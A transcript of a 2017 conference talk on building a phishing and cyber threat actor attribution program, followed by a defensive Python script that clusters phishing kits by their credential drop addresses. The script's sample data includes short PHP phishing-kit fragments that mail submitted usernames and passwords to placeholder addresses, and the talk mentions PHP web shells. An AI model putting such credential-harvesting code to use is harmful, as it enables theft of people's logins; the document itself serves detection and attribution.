
Knowing the Enemy Creating a Cyber Threat Actor Attribution Program

BSides Philly · 21:56 · 67 views · Published 2017-08 · Watch on YouTube
About this talk
Cyber-attacks have continued to rise, with existing threats evolving at a rapid pace while newer, more lethal threats emerge at an alarming rate. Despite organizations having increased their investments in technological solutions, we continue to see high-impact data breaches. This is partly because technical responses and safeguards are no longer sufficient preventative measures: they only remove the instruments of the attacks, not the causes themselves, the human attackers. Tactics, Techniques and Procedures (TTPs) surrounding cyber threats are part of the daily cyber security discussion. However, a very critical topic which must be included in the conversation is the attribution, and ultimately the identification, of cyber threat actors and the steps necessary to reach that goal.

Jack Johnson, Manager of the MarkMonitor Security Operations Center (SOC), has over 20 years of experience in the Enterprise Systems Engineering and Security space. Jack is a recognized subject matter expert in cyber security and enterprise-level system administration and security best practices. He is currently working on multiple projects developing new and improved phishing and malware detection, analysis and mitigation systems.

Jack Johnson https://youtu.be/_OqnyS67gn8
Transcript [en]

Alright, good afternoon everybody. My name is Jack Johnson and, as you can see, I'm the manager of the MarkMonitor Security Operations Center. MarkMonitor is a worldwide brand protection company, and pretty much what my team and I do is manage the anti-fraud product: we provide social engineering mitigation for Fortune 500 financial institutions as well as online gaming providers, etc. (This is very weird; well, it's loaded.) So today I'm going to talk to you guys about creating a cyber threat actor attribution program, and I just want to be clear before I start that I'm going to talk about two or three different aspects. The first aspect is the processes that you would need to go through inside of an organization to get this rolling, and what I mean by "program" is that there are some authorizations and permissions you need within your organization before you can start collecting information from employees, etc.

So this is something: does anybody recognize what this means? This stuff is Morse code. In my former life I spent eight years in the United States Navy as a Cryptologic Technician. Pretty much, I was a SIGINT operator, a signals interceptor, and I've been all over the world on six-month WestPac deployments, etc. What we would do is monitor communications, and basically I copied Morse code for eight or twelve hours a day, every day. Pretty boring, right? So to keep it from getting boring, what we would do is we would actually start identifying the person on the other side who was sending the Morse code, because you would learn their rhythms, their patterns, their habits, because Morse code is very rhythmic. We could even start diagnosing and figuring out if the person was having an off day: "Is this guy sick, man? This guy's sloppy, he's driving me nuts, you can't tell a dit from a dah, his dashes are off," etc. Some people would go even further and start making up a scenario: "I bet you he was arguing with his wife last night," or "this guy is drunk again, too much vodka," so you could think of what country we were dealing with.

But this quote that I just translated is from Sun Tzu, the famous Chinese strategist: "If you know the enemy and know yourself, you need not fear the result of a hundred battles." And this is the focus of our attribution program. Identifying the threat actor is where everyone's mind goes when you say attribution; you want to know who he is. That's important, but what's even more beneficial on a regular basis is understanding their habits and their tactics, how they're launching their attacks, and what their endgame is, because if you can understand their endgame then you know where their weak points are, where their attack points are, and how to defend against it. That was interesting, okay.

So I like definitions. I already went through that we're going to talk about a program, and what I want to focus on about the program is the aspect that talks about a set of related measures, events and activities over a particularly long term, because cyber threat actors, hackers, whatever you call them, are in this to win it. I manage 26 analysts in our security operations center; we're 24 by 7, 365. I've been there since 2004, 12 years, and the social engineering attacks, phishing, malware, are just going up, and I'll show you some stats later to prove that.

So whenever I onboard new analysts I like to tell people that today information security is not a job, it's not a career, it's a lifestyle. It's something I take home with me; I get calls and emails 24 hours a day because it doesn't stop. We just had the busiest weekend ever because of Black Friday going into Cyber Monday. I mean, it's really explosive. So what we do in our organization is we detect the phishing sites and malware sites and we take them offline, but customers always want more, right? You've never had a customer say, "Man, this product hasn't evolved in ten years, but I still love it." No, that's not the case. Our customers always ask, "Can we do something more?" One of my customers that I worked with for a long time, a credit card issuer, said, "I wish I knew who's behind this stuff, I just wish I knew more about the perpetrators." So I took that to heart and we started talking. I talked to my management and said there is more we can do, but it's a thin line between legal and illegal once you start getting into the deep end of the water. So we went through it, we got C-level management and IT security, got authorization from everyone, and we said, okay, this is what we need to do: we need to start collecting information so that we can analyze it and see what's going on, and we also extend this out to our customers and offer them additional help. But you just need permissions, and you need to talk to your legal department to make sure that everything you're doing is clear so that no one's going to get in trouble.

This is an example of a social engineering attack that was launched against one of the Democratic headquarters' key people for the 2016 election, and what you'll notice is that they sent a Bitly link that was mimicking a Gmail account, and there were only two clicks. In 2016 this is what you call a spear phishing attack. This means that the first click was the actual threat actor testing the phishing site and the second click was the victim. This is how pinpoint accurate their attacks are, and this is why the attribution aspect is very critical, because you don't have a lot of time these days to get your hands around the problem. They hit and then they get what they want; they exposed this guy's emails, etc. Here's another example. This is what we call business email compromise, or a CEO scam, where at a cable giant the CFO received an email and transferred 40 million euros. This is the kind of impact it will have, and when you're speaking to your executive management, or your management in general, when you want to invest, time is money, but if you show them facts and figures like this it kind of gets their ear and they're willing to participate. So to make it work you need permission, you've got to put your protocols in place, procedures, processes, and then you have a program. I call this the five Ps.

Then, to make it work, and this is getting to where I really want to go, I had a team of engineers and analysts that we started working with together in 2014. We hired a new guy, and a couple of other analysts really leveled up; they were studying for their CEH, getting into pentesting and rainbow tables, all this stuff. So we sat together and came up with a new game plan to see if we could start identifying these threat actors by behavioral characteristics and other identifying characteristics.

So social engineering: it all starts with what we call phishing. I like to ask everyone this: what's a phish? Because whenever I ask someone what's a phish I get, "It's like a website, or a link that you get, or something suspicious," where the reality is, you're the fish. Cyber threat actors are trying to snare you and me; we're the ones who have the credentials, the passwords, the usernames, the access, we have the credit card numbers. This is what they're trying to catch.

Here are some stats. If you look, the financial industry comprises 38% of all social engineering attacks, phishing and malware. If this were three years ago it would have been maybe 80%, and if you notice, ISPs, hosting and retail are taking up a lot of the pie now. The reason for this is that ISPs and hosting providers also include email providers. A lot of the social engineering attacks today are not brand-specific targeting, meaning they're not asking for your banking account right out front as much as they used to, because today a lot of sites are tied to your personal email address. So this is where the threat actors have pivoted, and now they're going after your personal accounts, because if you think about any social networking site that you authenticate on, you use your personal email account; a lot of banks, etc. So let's look at these numbers. You see Dropbox and Google: in 2014 our Security Operations Center detected 8 Dropbox sites; if you look at 2015 it's 50,000; coming into 2016 it's over a hundred thousand. But look at Google. Google exploded, because Google has Gmail, you have your Google Docs, you also have your Android devices that authenticate. A lot of people are not aware that you can go through the web version of the Google Marketplace or Play Store and install apps onto your phone. This is an avenue for malware infections, and most users and even security professionals aren't aware that this is how these unauthorized third-party apps are getting installed. It's not that users are going to these websites and installing these APKs; the threat actors, once they have the credentials, are installing them themselves, and the user will never know that the app was there.

So what we do is we monitor communication channels. This includes email, SMS, voice over IP, etc. This is how we monitor their pathways, and then we intercept the communications, and then we can start building our program. We also monitor internal data sources. Users are your greatest asset: if you build a network of users and they understand what they should do when they receive something suspicious, you will be amazed at the amount of data that you can receive and collect on a daily basis. It's also important for users to know that they should forward suspicious communications from their personal accounts, because people are checking their Yahoo, their Gmail, their Facebook, their Twitter accounts at work on work machines. So you can lock down your corporate environment, your Exchange server or what have you, but there are still different conduits to come in. External data sources: these are open source intelligence feeds. PhishTank, you have MISP accounts, you have NGOs, APWG, malware feeds; you have all these organizations who are collecting all this information that you can sign up and partner with, and they'll put you in as part of their data exchange. You also have your trusted communities. If you're a cyber security professional today, there is definitely strength in numbers. You cannot work in a vacuum or in a silo and be successful, because your attacks are probably the same as their attacks, and I'm seeing the same attacks, but we're not talking. Threat actors are definitely talking, because they're in the underground forums, dark web, etc., sharing information.

So here we get into the attribution aspect. What we noticed in so many attacks is that the attackers mostly attack at the same time. So in one attack there was a malware actor, and we noticed that he sent the messages at the same time, so through research we figured out that he's in Mexico through the time that he's active. It's also a reflection of how much intelligence they have on your organization, depending on what time they try to hit you. So I'm not a poker player, but I like this philosophy. Poker is a game based on information availability, and what I really took away from this quote by David Sklansky is that there are poker tells; threat actors have tells as well, and it can tell you a lot about their skill level, etc., based on how they conduct their business. So you have betting patterns and physical tells. You see, when you watch the World Series of Poker, all the guys are doing these weird things to obfuscate their behavior, because they don't want to reveal when they have a good hand or a bad hand. Threat actors are doing the same thing, it's just in cyberspace.

So hacker tells: behaviors and habits, periods of activity, automation. Sometimes we'll detect a massive phishing attack where someone puts up 50 phishing sites; we take them offline, they come back in a minute. That threat actor is highly organized, they're automating, and they're also monitoring their stuff. Human limitations: everyone, myself included, we have resources and personal limits, like my knowledge is a limiting factor, but if I partner with you and you're good in a certain area of technology I can really level up pretty quickly. Also the imagination. We look at their resources. Today it's very easy to get into cyber crime, because there's ransomware as a service, malware as a service, you even have phishing as a service. An example of ransomware as a service is Locky: the Locky author only takes fifteen percent of the profit, while anyone who distributes the Locky malware receives 80 to 85 percent of the ransom. We also look at attack habits. Some threat actors like to pop WordPress sites through the plugins; some people break into all CMS systems, that's your Joomla, your WordPress, your Drupal; we see guys who love breaking into cPanels, the control panels that control servers. SQL injection is very popular, and then PHP web shells and redirect directives. PHP web shells are awesome because, if you're familiar with a web shell, once it's installed it just gives you root access to the box through a web browser. Here's an example of a PHP shell, and you can see it has permissions and directories; you just click and browse it, you don't even have to know Linux to do this.

Alright, so now I get to the part you guys really want to hear about. Now we're going to get into some attribution. In 2014 we teamed up with an investigative group. They said they could identify hackers, so I was like, okay, I've got the perfect guy for you, because we had been building, not a case, but a database of threat actors, and I said this guy is super prolific and I would love to know who he is. So we build our database by collecting the social engineering lures, because this is the evidence that they leave behind. Think of it like we're crime scene investigators. When they send you a malware binary, they're exposing themselves, because the binary is now in your possession and there's a lot of forensic evidence in binaries. One thing about hackers and social engineering attackers in general: they hate whitespace, so anytime there's whitespace in a file, etc., they'll put something in it. Sometimes they put their name, sometimes they put a certain character sequence or something. It's almost like bubble wrap; people cannot resist popping it. One thing I want to caution against is collecting too much information. I know I'm kind of contradicting myself, because I said you need all the information you can get, but you have to organize it or you'll be overwhelmed.

In the next example, these are phishing kits that we collected from a threat actor in just two days; this is how busy this individual is. So we collected the files, extracted them, and I looked through all the text files. I just do a grep, I'm not manually looking through, but we find common strings, and one common string that popped out is he was kind enough to tell us who created it, because he wants props, and also, once the user hits submit, the email address the credentials go to is here. This is very important. This line right there, "created by," is evidence, but it's not as damning or identifiable as the email address, because the email address is where he's going to receive the stolen credentials. So from attack to attack to attack, if you see that it's the same, it's the same threat actor; I don't think they're sharing email accounts to do this stuff. So once I built up enough of these examples I put them into a spreadsheet, and this is truncated; the spreadsheet is thousands of rows. What jumped out at me is that through all of these entries there are a couple of email addresses. These are all the same thing, and, excellent, this one was different, and then this one at the bottom is different. If you look at the file names he uses, they're all the same, and so forth in this example and this example. So what that showed is that he had at the time three unique phish kits that he was using; the one with Luke PHP is the prevalent one. Next I put it into Maltego and did a graph of it, and what this shows you is that there are two different brands: the first one is a major shipping organization and the second one was Yahoo. So we saw that he actually pivoted out. This guy was targeting all the major shipping organizations, but then we noticed he's targeting Yahoo. This was 2014, around October, so this is where we started seeing a shift into the free email accounts. So this was the beginning. The red balls, these are incident IDs, because there's a customer, so we actually created tickets and enforced on them; the yellow row is part of the unique URLs, and then you see the phish kits. So we saw clusters, I don't know if you guys use Maltego, and at the bottom those are the three unique emails where he was shipping the data.

So through all this information we were able to use investigative tools to try to see, now that we have all this information, can we attribute them. We use CentralOps or DomainTools, I don't know if you guys are familiar, but you can look up Whois records, network Whois records, DNS server records, and passive DNS. Passive DNS is great because you can look up historical Whois records. I meant to include an example: just yesterday one of my analysts came up and said, "I think I've got another threat actor," because what he noticed is that the Whois record for a domain that was registered as a lookalike domain, like Google with three o's, etc.; someone had registered it and sent out phishing messages, but then we noticed that the Whois went private. So I said the guy must have slipped up when he first registered the domain and then changed it to private, but through passive DNS or any kind of historical Whois record system you can look at it. CLEAR and Accurint are tech services that allow you to, basically, it's not like a background check on a person, but you can search on people, and Spokeo is a free, not a free version but a cheaper version of the same thing. CLEAR is what I used for this investigation because we were part of Thomson Reuters at the time, and it's Thomson Reuters' investigative services product, and this is the guys who came and told me they could do it.

So this is hacker Dread. We were able to fully identify everything about him: he's a Nigerian national, we have his date of birth, we got his Facebook account, Twitter account, LinkedIn account, and we've been able to successfully do this on numerous threat actors again and again, because once we built the program and put everything in place to make sure that now we have the information coming in, we're organizing the information and structuring it into a database, and now we can query, we can see the prominent threat actors and who are the big targets they go after, and it's like one, two, three. Now at one point people thought it was impossible to go after these Nigerians because they're in Nigeria. The Nigerian government, through efforts with law enforcement, the FBI primarily, stepped their game up, resulting in, August first, you see this: the end of the 60 million dollar scam. Voila, that's where we're going. What we need to do is make ourselves a hard target, meaning when they put these sites up, they're sending malware, shut them down immediately, let them know that you're not just going to take it; then we need to go after them and take them offline permanently. That's it. Anybody got any questions? Alright, thank you.
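The kit-analysis workflow the talk describes (grep the extracted kit files for the "created by" string and the drop address the stolen credentials are mailed to, put the hits in a spreadsheet, cluster kits that share an address, and use the times the actor is active as a supporting hint) can be scripted. The following is an added example written for this page; it is not the speaker's or MarkMonitor's code. All kit contents, addresses, names, filenames and timestamps are constructed placeholders, and the regexes assume the plain kit style where an address is stored in a PHP variable and passed to mail(); obfuscated kits would need their own extractor.

```python
import re
from collections import Counter, defaultdict

# Constructed sample kits (archive/file -> PHP source). Every address, name and
# filename is a placeholder invented for this example, not data from the talk.
SAMPLE_KITS = {
    "kit1.zip/login.php": (
        '<?php $send = "drop1@example.com";\n'
        '$msg = "user: " . $_POST["u"] . " pass: " . $_POST["p"];\n'
        'mail($send, "Result", $msg); // created by: Tester0\n'),
    "kit2.zip/index.php": (
        '<?php $to = "drop1@example.com";\n'
        'mail($to, "Login", $_POST["email"] . " " . $_POST["pw"]);\n'),
    "kit3.zip/post.php": (
        '<?php /* Created By Tester0 */\n'
        '$ar = "drop2@example.net"; $cc = "drop3@example.org";\n'
        'mail($ar, "Rez", print_r($_POST, true)); mail($cc, "Rez", print_r($_POST, true));\n'),
    "kit4.zip/send.php": (
        '<?php $headers = "From: noreply@example.com";\n'
        '$recipient = "other@example.com";\n'
        'mail($recipient, "x", $_POST["u"], $headers);\n'),
}
# Constructed first-seen times (UTC) for one actor's sites.
SAMPLE_FIRST_SEEN = [
    "2016-10-03 15:12", "2016-10-03 16:40", "2016-10-04 16:05", "2016-10-04 17:30",
    "2016-10-05 18:22", "2016-10-05 19:10", "2016-10-06 20:48", "2016-10-06 21:15",
    "2016-10-07 22:01", "2016-10-08 03:33"]

EMAIL = r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[\"'](" + EMAIL + r")[\"']")          # $var = "addr"
MAIL_RE = re.compile(r"\bmail\s*\(\s*(?:\$(\w+)|[\"'](" + EMAIL + r")[\"'])")  # mail($var / "addr"
CREATED_RE = re.compile(r"(?i)\bcreated\s+by\s*[:\-]?\s*([A-Za-z0-9_.-]+)")


def extract_evidence(src):
    """Return (drop_addresses, tags) for one kit file. Only an address actually
    handed to mail() is a drop address (a From: header is not where stolen
    credentials go); 'created by' tags are the weaker, vanity evidence."""
    assigned = {var: addr.lower() for var, addr in ASSIGN_RE.findall(src)}
    drops = set()
    for var, literal in MAIL_RE.findall(src):
        if literal:
            drops.add(literal.lower())
        elif var in assigned:
            drops.add(assigned[var])
    return drops, {t.lower() for t in CREATED_RE.findall(src)}


def cluster_by_drop_address(kits):
    """Kits that ship credentials to the same address are one actor. Union-find
    over addresses so a kit with two drop addresses links both to one cluster."""
    evidence = {name: extract_evidence(src) for name, src in kits.items()}
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            x = parent[x]
        return x

    for drops, _ in evidence.values():
        first, *rest = sorted(drops) or [None]
        for other in rest:
            parent[find(other)] = find(first)
    clusters = defaultdict(lambda: {"kits": [], "drops": set(), "tags": set()})
    for name, (drops, tags) in evidence.items():
        if not drops:
            continue  # nothing recovered: set aside for manual review
        c = clusters[find(min(drops))]
        c["kits"].append(name)
        c["drops"] |= drops
        c["tags"] |= tags
    return sorted(({k: sorted(v) for k, v in c.items()} for c in clusters.values()),
                  key=lambda c: c["kits"])


def weak_links(clusters):
    """Cluster indexes that share only a 'created by' tag: a lead, not proof."""
    by_tag = defaultdict(list)
    for i, c in enumerate(clusters):
        for t in c["tags"]:
            by_tag[t].append(i)
    return {t: idx for t, idx in by_tag.items() if len(idx) > 1}


def busiest_window(first_seen_utc, hours=8):
    """UTC start hour of the busiest `hours`-long span. With an assumed working
    day this narrows the actor's time zone; it corroborates, it does not attribute."""
    counts = Counter(int(ts[11:13]) for ts in first_seen_utc)
    return max(range(24), key=lambda h: sum(counts[(h + i) % 24] for i in range(hours)))


if __name__ == "__main__":
    found = cluster_by_drop_address(SAMPLE_KITS)
    print(found, weak_links(found), busiest_window(SAMPLE_FIRST_SEEN))
```

On the sample data kit1 and kit2 fall into one cluster because they mail to the same address, kit3 forms its own cluster with two drop addresses, and kit4's From: header is correctly ignored. The "created by" tag links the first two clusters only as a weak link, which matches the talk's point that the drop address, not the signature, is the identifying evidence.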